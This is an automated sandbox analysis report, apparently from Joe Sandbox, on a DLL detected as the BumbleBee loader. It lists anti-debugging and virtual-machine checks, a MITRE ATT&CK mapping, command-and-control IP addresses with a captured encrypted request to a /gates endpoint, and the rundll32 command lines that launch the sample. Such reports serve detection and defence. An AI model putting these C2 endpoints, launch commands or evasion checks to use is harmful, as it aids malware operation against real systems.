                    Source: rundll32.exe, 00000004.00000003.365598019.000001C336C30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.365622335.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.362004087.000001C336C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.359859619.000001C336C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemcomputerP-716T771
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF31119BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000021EF31119BC
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3017D40 LoadLibraryA,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueA,CloseHandle,GetProcAddress,CloseHandle,3_2_0000021EF3017D40
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3020FD0 GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,3_2_0000021EF3020FD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3144530 SetUnhandledExceptionFilter,3_2_0000021EF3144530
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338844530 SetUnhandledExceptionFilter,4_2_000001C338844530
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388119BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001C3388119BC

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\rundll32.exe Network Connect: 91.122.18.192 443
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_0000021EF30210E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387210E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,4_2_000001C3387210E0
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3127160 GetSystemTimeAsFileTime,3_2_0000021EF3127160
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3020770 GetUserNameW,3_2_0000021EF3020770
                    Source: rundll32.exeBinary or memory string: procmon.exe
                    Source: rundll32.exeBinary or memory string: tcpview.exe
                    Source: rundll32.exeBinary or memory string: Wireshark.exe
                    Source: rundll32.exeBinary or memory string: procexp.exe
                    Source: rundll32.exeBinary or memory string: LordPE.exe
                    Source: rundll32.exeBinary or memory string: autoruns.exe
                    Source: rundll32.exeBinary or memory string: ollydbg.exe
                    Source: rundll32.exeBinary or memory string: regmon.exe
                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | 2 Windows Management Instrumentation | Path Interception | 211 Process Injection | 331 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 21 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 211 Process Injection | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 331 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 11 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 22 System Information Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                    Source | Detection | Scanner | Label
                    mount.dll | 49% | Virustotal |
                    mount.dll | 23% | Metadefender |
                    mount.dll | 77% | ReversingLabs | Win64.Trojan.Bumbleloader
                    mount.dll | 100% | Avira | TR/Crypt.Agent.ogakg
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    91.122.18.192:443 | 0% | Virustotal |
                    91.122.18.192:443 | 0% | Avira URL Cloud | safe
                    282.19.133.12:443 | 0% | Avira URL Cloud | safe
                    72.123.65.11:443 | 0% | Virustotal |
                    72.123.65.11:443 | 0% | Avira URL Cloud | safe
                    149.255.35.167:443 | 0% | Avira URL Cloud | safe
                    185.156.172.62:443 | 0% | Avira URL Cloud | safe
                    172.241.27.146:443 | 0% | Avira URL Cloud | safe
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    91.122.18.192:443 | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                    282.19.133.12:443 | true | Avira URL Cloud: safe | unknown
                    72.123.65.11:443 | true | 0%, Virustotal; Avira URL Cloud: safe | unknown
                    149.255.35.167:443 | true | Avira URL Cloud: safe | unknown
                    185.156.172.62:443 | true | Avira URL Cloud: safe | unknown
                    172.241.27.146:443 | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.openssl.org/docs/faq.html | rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      91.122.18.192 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | true
                      185.156.172.62 | unknown | Romania | 9009 | M247GB | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:622711
                      Start date and time: 2022-05-09 16:07:15 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:mount.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@9/0@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 69.1% (good quality ratio 53.9%)
                      • Quality average: 50.3%
                      • Quality standard deviation: 34.9%
                      HCA Information:
                      • Successful, ratio: 87%
                      • Number of executed functions: 76
                      • Number of non-executed functions: 284
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 80.67.82.211, 80.67.82.235
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      Time | Type | Description
                      16:08:34 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
                      16:09:23 | API Interceptor | 671x Sleep call for process: rundll32.exe modified
                                      No created / dropped files found
                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Entropy (8bit):5.559897819745863
                                      TrID:
                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                      • Win64 Executable (generic) (12005/4) 10.17%
                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                      • DOS Executable Generic (2002/1) 1.70%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                      File name:mount.dll
                                      File size:3846656
                                      MD5:8e7115ea580f39c152e4d4bc4472c402
                                      SHA1:4ea1f1d8a01f251fa5db350f72b04a1d11028fb0
                                      SHA256:c65c51ed60f91a92789c4b056821ef51252baa2a1679a6513ab008acf0464ccb
                                      SHA512:bde81a4da80dda9e06815b153caa2dcaea874bfd973c9d24b1e935e0c88a0d094dcce0b153d9866a87b2b06bc636a30b23d3fe27e345b4a2ee174b52acc44619
                                      SSDEEP:98304:XZo5q0spyUTJkqVnIY0z7ceiVNhPvpx3:XZwqlp51krrz4vp
                                      TLSH:DD066CF69CC8A15BBC54ECCDF736C570409BAD09F9DFC80789A4162B5888139E79F688
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........d.U...U...U....h..V...U...B.......Q.......T.......T...RichU...........................PE..d....4ab.........." .....j...D:....
                                      Icon Hash:74f0e4ecccdce0e4
                                      Entrypoint:0x180001000
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x180000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                      Time Stamp:0x6261340F [Thu Apr 21 10:38:07 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:a5d156f0c03955fd5c90a10345646746
                                      Programming Language:
                                      • [C++] VS2015 UPD3.1 build 24215
                                      • [EXP] VS2015 UPD3.1 build 24215
                                      • [LNK] VS2015 UPD3.1 build 24215
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1fac00 | 0x50 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fac50 | 0x28 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3ad000 | 0x114 | .pdata
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1faa10 | 0x1c | .rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0xc0 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x6843 | 0x6a00 | False | 0.578530365566 | COM executable for DOS | 5.84683219257 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x8000 | 0x1f2eea | 0x1f3000 | False | 0.480568558993 | data | 4.28896463003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x1fb000 | 0x1b1108 | 0x1b1200 | False | 0.556410646645 | data | 4.83832650038 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .pdata | 0x3ad000 | 0x114 | 0x200 | False | 0.3984375 | data | 2.60863721977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      DLL | Import
                                      KERNEL32.dll | GetCommandLineA, CreateFileA, FindFirstFileA, FindNextFileA, GetFileAttributesA, GetFileInformationByHandle, WriteFile, CloseHandle, HeapAlloc, HeapFree, GetProcessHeap, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, GetModuleHandleExA, GetProcAddress, SwitchToFiber, DeleteFiber, CreateFiber, LoadLibraryA
                                      Name | Ordinal | Address
                                      shjKeAQfgT | 1 | 0x1800012bc
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      May 9, 2022 16:11:29.514398098 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.515578985 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.556520939 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.556704044 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.556724072 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898237944 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898309946 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:29.898376942 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.898647070 CEST49774443192.168.2.4185.156.172.62
                                      May 9, 2022 16:11:29.898664951 CEST44349774185.156.172.62192.168.2.4
                                      May 9, 2022 16:11:30.249600887 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.249660015 CEST4434977591.122.18.192192.168.2.4
                                      May 9, 2022 16:11:30.249767065 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.250150919 CEST49775443192.168.2.491.122.18.192
                                      May 9, 2022 16:11:30.250170946 CEST4434977591.122.18.192192.168.2.4
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49774 | 185.156.172.62 | 443 | C:\Windows\System32\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-09 14:11:29 UTC | 0 | OUT | GET /gates HTTP/1.1
2022-05-09 14:11:29 UTC | 0 | OUT | Data Raw: 48 6f 73 74 3a 20 31 38 35 2e 31 35 36 2e 31 37 32 2e 36 32 0d 0a
Data Ascii: Host: 185.156.172.62
2022-05-09 14:11:29 UTC | 0 | OUT | Data Raw: 55 73 65 72 2d 41 67 65 6e 74 3a 20 4a 6e 41 69 4b 53 44 79 43 44 0d 0a
Data Ascii: User-Agent: JnAiKSDyCD
2022-05-09 14:11:29 UTC | 0 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 37 0d 0a
Data Ascii: Content-Length: 177
2022-05-09 14:11:29 UTC | 0 | OUT | Data Raw: 0d 0a
Data Ascii:
2022-05-09 14:11:29 UTC | 0 | OUT | Data Raw: 0d dd 87 07 ce f9 79 70 ef 3f e9 7d b8 98 0d 8a 4b cb 32 73 e5 bd 2d 3a 91 24 b2 e5 f0 87 90 19 6d f2 11 38 ce 93 01 7b 2b 74 3e 27 2f 0b e6 4d 49 21 f6 f2 ee ad f7 98 dd 00 58 70 c2 67 a3 43 e0 c1 c0 e1 a2 ad b7 f7 21 23 25 93 39 ca 70 14 8f 82 e3 96 14 aa 54 79 5e e0 ac 70 e1 44 08 88 31 b9 0d fe d9 19 39 bc ae 8c b3 fb e4 22 6a e5 f2 77 26 aa c5 a7 d3 40 b6 7e c1 78 b6 cf 69 ca 11 bd 26 0a ad ab fd 72 6a d2 09 3b 16 f0 64 6b e7 60 1b 06 f2 0c f2 e4 61 1f cb aa e9 e3 e4 95 56 a1 67 9c bb 33 3b 97 a6 46 df 37 1d bf 84 79 dd
Data Ascii: yp?}K2s-:$m8{+t>'/MI!XpgC!#%9pTy^pD19"jw&@~xi&rj;dk`aVg3;F7y
2022-05-09 14:11:29 UTC | 0 | IN | HTTP/1.1 200 OK
content-type: application/json
date: Mon, 09 May 2022 14:11:29 GMT
content-length: 34
connection: close
2022-05-09 14:11:29 UTC | 0 | IN | Data Raw: 0d dd 96 0e d4 ec 78 6a c3 33 d2 2c f6 db 1c ce 0f 88 3d 71 ff f9 6f 38 d1 29 f3 f3 fa 8f 83 4d 36 eb
Data Ascii: xj3,=qo8)M6



                                      Target ID:0
                                      Start time:16:08:28
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\loaddll64.exe
                                      Wow64 process (32bit):false
                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\mount.dll"
                                      Imagebase:0x7ff68f9b0000
                                      File size:140288 bytes
                                      MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:1
                                      Start time:16:08:28
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                                      Imagebase:0x7ff7bb450000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:2
                                      Start time:16:08:29
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      Target ID:3
                                      Start time:16:08:29
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mount.dll",#1
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      Target ID:4
                                      Start time:16:08:34
                                      Start date:09/05/2022
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT
                                      Imagebase:0x7ff71da80000
                                      File size:69632 bytes
                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BumbleBee, Description: Yara detected BumbleBee, Source: 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high


                                        Execution Graph

                                        Execution Coverage:1.9%
                                        Dynamic/Decrypted Code Coverage:0.2%
                                        Signature Coverage:31.5%
                                        Total number of Nodes:635
                                        Total number of Limit Nodes:20
GetProcAddress 47808->47810 47809->47807 47810->47809 47811 21ef301b454 GetProcAddress 47810->47811 47811->47809 47812 21ef301b470 GetProcAddress 47811->47812 47812->47809 47813 21ef301b48c GetProcAddress 47812->47813 47813->47807 47814->47704 47878 21ef3111ed8 47815->47878 47817 21ef2fe916a 47818 21ef3111c8c 47817->47818 47886 21ef3126870 47818->47886 47820 21ef2fe9172 47820->47788 47822 21ef2fe6477 47821->47822 47826 21ef2fe641d 47821->47826 47823 21ef2fe6523 47822->47823 47824 21ef2fe6481 47822->47824 47911 21ef310a1b0 5 API calls _CxxThrowException 47823->47911 47830 21ef2fe6496 ctype 47824->47830 47910 21ef2fe68c0 RaiseException Concurrency::cancel_current_task ctype new 47824->47910 47826->47822 47829 21ef2fe6446 47826->47829 47831 21ef2fe6637 47829->47831 47832 21ef2fe655e 47829->47832 47830->47717 47913 21ef310a1d4 5 API calls _CxxThrowException 47831->47913 47834 21ef2fe659c 47832->47834 47835 21ef2fe656d 47832->47835 47836 21ef2fe65a6 47834->47836 47837 21ef2fe6650 47834->47837 47842 21ef2fe657b ctype 47835->47842 47914 21ef310a1d4 5 API calls _CxxThrowException 47835->47914 47836->47842 47912 21ef2fe68c0 RaiseException Concurrency::cancel_current_task ctype new 47836->47912 47915 21ef310a1b0 5 API calls _CxxThrowException 47837->47915 47842->47717 47843->47726 47844->47728 47845->47730 47846->47732 47847->47734 47848->47736 47849->47752 47850->47752 47851->47752 47852->47752 47853->47749 47854->47743 47855->47759 47856->47761 47857->47763 47858->47765 47859->47767 47860->47769 47861->47771 47862->47773 47863->47751 47864->47787 47865->47780 47866->47782 47869 21ef3122114 _Getctype 4 API calls 47868->47869 47870 21ef3111db2 47869->47870 47871 21ef3124ee0 __free_lconv_mon 4 API calls 47870->47871 47872 21ef3111dbc 47871->47872 47873 21ef3111dc3 GetModuleHandleExW 47872->47873 47874 21ef3111ddd 47872->47874 47873->47874 47874->47795 47874->47799 47875->47793 47876->47798 47877->47799 47879 21ef3111ee6 47878->47879 47883 21ef3111ef6 47878->47883 47884 
21ef3118984 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47879->47884 47881 21ef3111eeb 47885 21ef3111bc8 SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47881->47885 47883->47817 47884->47881 47885->47883 47887 21ef3126880 _com_util::ConvertStringToBSTR 47886->47887 47888 21ef3126892 47887->47888 47906 21ef3126f7c TlsGetValue 47887->47906 47890 21ef3122114 _Getctype 4 API calls 47888->47890 47893 21ef31268db 47888->47893 47891 21ef31268a9 47890->47891 47892 21ef31268b1 47891->47892 47907 21ef3126fd4 TlsSetValue 47891->47907 47897 21ef3124ee0 __free_lconv_mon 4 API calls 47892->47897 47895 21ef31268e0 SetLastError 47893->47895 47896 21ef31268f6 SetLastError 47893->47896 47895->47820 47909 21ef311f8c8 15 API calls abort 47896->47909 47900 21ef31268b8 47897->47900 47898 21ef31268c8 47898->47892 47901 21ef31268cf 47898->47901 47900->47896 47908 21ef31265dc SetLastError SetLastError TlsGetValue TlsSetValue _invalid_parameter_noinfo 47901->47908 47904 21ef31268d4 47905 21ef3124ee0 __free_lconv_mon 4 API calls 47904->47905 47905->47893 47906->47888 47907->47898 47908->47904 47910->47830 47912->47842 47913->47835 47914->47837 47916 21ef2feae60 47917 21ef2feae75 47916->47917 47923 21ef2feaefe 47916->47923 47918 21ef2feae9a 47917->47918 47919 21ef2feaea4 VirtualAlloc 47917->47919 47924 21ef301b69c GetModuleHandleA 47918->47924 47919->47918 47922 21ef3111df0 8 API calls 47922->47923 47925 21ef301b6c9 47924->47925 47929 21ef2feaed9 47924->47929 47930 21ef301c2b0 47925->47930 47929->47922 47931 21ef301b6df 47930->47931 47932 21ef301c2ef 47930->47932 47931->47929 47938 21ef301b4bc 47931->47938 47932->47931 47933 21ef301c424 47932->47933 47934 21ef301c3de lstrcmpA 47932->47934 47933->47931 47935 21ef301c440 47933->47935 47934->47932 47934->47933 47948 21ef301c1ec 9 API calls 2 library calls 47935->47948 47937 21ef301c44b 47937->47931 47941 21ef301b4e8 47938->47941 47940 21ef301b573 47940->47929 47942 21ef301b54e 
47941->47942 47949 21ef301b7d8 47941->47949 47942->47940 47957 21ef301c02c 47942->47957 47944 21ef301b5da VirtualProtectEx 47944->47940 47946 21ef301b63c VirtualProtectEx 47944->47946 47946->47940 47948->47937 47952 21ef301b806 47949->47952 47950 21ef301b882 47954 21ef301b8a8 VirtualQuery 47950->47954 47955 21ef301b8fe 47950->47955 47956 21ef301b8cb VirtualAlloc 47950->47956 47951 21ef301b825 VirtualQuery 47951->47952 47952->47950 47952->47951 47953 21ef301b848 VirtualAlloc 47952->47953 47953->47952 47953->47955 47954->47950 47955->47942 47956->47950 47956->47955 47960 21ef301c05e 47957->47960 47958 21ef310c290 _com_util::ConvertStringToBSTR 4 API calls 47959 21ef301b5a4 47958->47959 47959->47940 47959->47944 47960->47958 47961 21ef2fe9060 48034 21ef301df60 47961->48034 47965 21ef2fe912d 47967 21ef2fe6530 5 API calls 47965->47967 47968 21ef2fe9151 47965->47968 47966 21ef2fe9124 WaitForSingleObject 47966->47965 47967->47968 47969 21ef3111f70 4 API calls 47968->47969 47970 21ef2fe916a 47969->47970 47971 21ef3111c8c 15 API calls 47970->47971 47972 21ef2fe9172 47971->47972 47973 21ef3111df0 8 API calls 47972->47973 47974 21ef2fe9196 47973->47974 47975 21ef2fe6400 5 API calls 47974->47975 47976 21ef2fe91ec 47975->47976 47977 21ef2fe6400 5 API calls 47976->47977 47978 21ef2fe9233 CoInitializeEx CoInitializeSecurity 47977->47978 47979 21ef301b3f0 6 API calls 47978->47979 47980 21ef2fe929a CreateEventW 47979->47980 47981 21ef2fe92ba CloseHandle 47980->47981 47983 21ef2fe92c4 _com_util::ConvertStringToBSTR 47980->47983 47982 21ef2fe92e5 CoUninitialize ExitProcess 47981->47982 47982->47983 48040 21ef2fe1610 21 API calls ctype 47983->48040 47985 21ef2fe940c 48041 21ef2fe3600 21 API calls memcpy_s 47985->48041 47987 21ef2fe9418 48042 21ef2fe1440 5 API calls memcpy_s 47987->48042 47989 21ef2fe942b 48043 21ef2feb0a0 RaiseException SetLastError SetLastError TlsGetValue TlsSetValue 47989->48043 47991 21ef2fe944c 48044 21ef2feb0a0 RaiseException SetLastError SetLastError 
